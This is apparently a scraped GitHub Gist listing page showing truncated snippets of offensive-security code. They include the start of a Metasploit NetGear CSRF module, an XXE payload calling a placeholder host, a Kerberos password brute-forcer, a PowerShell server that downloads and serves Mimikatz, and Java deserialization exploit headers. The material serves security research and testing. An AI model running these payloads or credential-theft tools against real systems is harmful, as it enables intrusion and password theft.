Skip to content

Instantly share code, notes, and snippets.

Avatar

Chris Gates carnal0wnage

View GitHub Profile
View jenkins-api.md

jobs

jenkins_url + /api/json?tree=jobs[name,color]

builds

jenkins_url + /job/${job_name}/api/json?tree=builds[number,status,timestamp,id,result]

last build

View README.md
View netgear_upnp_csrf.rb
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'NetGear UPnP CSRF',
View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@n0531m
n0531m / list_gcp_iprange.sh
Last active Jun 2, 2021
Google Cloud Platform : ip address range
View list_gcp_iprange.sh
#!/bin/bash
# https://cloud.google.com/compute/docs/faq#find_ip_range
# nslookup -q=TXT _cloud-netblocks.googleusercontent.com 8.8.8.8
myarray=()
for LINE in `dig txt _cloud-netblocks.googleusercontent.com +short | tr " " "\n" | grep include | cut -f 2 -d :`
do
myarray+=($LINE)
for LINE2 in `dig txt $LINE +short | tr " " "\n" | grep include | cut -f 2 -d :`
@ropnop
ropnop / kinit_brute.sh
Last active Jun 6, 2021
A quick tool to bruteforce an AD user's password by requesting TGTs from the Domain Controller with 'kinit'
View kinit_brute.sh
#!/bin/bash
# Title: kinit_brute.sh
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful
View blackhat_arsenal.md

Cumulus Toolkit Cliff Notes

By popular demand, here are my notes for running the demo I presented at Blackhat Arsenal 2017. These are not full instructions on how to setup the full environment, please let me know if you are interested in such a thing.

References:

@cobbr
cobbr / server.ps1
Last active Jan 30, 2020 — forked from obscuresec/dirtywebserver.ps1
Dirty PowerShell Webserver
View server.ps1
$mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1")
$Hso = New-Object Net.HttpListener
$Hso.Prefixes.Add("http://+:8080/")
$Hso.Start()
While ($Hso.IsListening) {
$HC = $Hso.GetContext()
$HRes = $HC.Response
$HRes.Headers.Add("Content-Type","text/plain")
If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') {
$Buf = [Text.Encoding]::UTF8.GetBytes($mk)
@DiabloHorn
DiabloHorn / deserlab_exploit.py
Created Sep 9, 2017
Exploit for the DeserLab vulnerable implementation
View deserlab_exploit.py
#!/usr/bin/env python
"""
DiabloHorn - https://diablohorn.com
References
https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/
https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html
https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html
http://gursevkalra.blogspot.nl/2016/01/ysoserial-commonscollections1-exploit.html
https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
https://www.slideshare.net/codewhitesec/exploiting-deserialization-vulnerabilities-in-java-54707478
@DiabloHorn
DiabloHorn / ManualPayloadGenerate.java
Created Sep 9, 2017
Java class to generate a Groovy serialized payload
View ManualPayloadGenerate.java
/*
DiabloHorn - https://diablohorn.com
For learning purposes we build the groovy payload ourselves instead of using
ysoserial. This helps us better understand the chain and the mechanisms
involved in exploiting this bug.
compile with:
javac -cp <path to groovy lib> ManualPayloadGenerate.java
Example:
javac -cp DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar ManualPayloadGenerate.java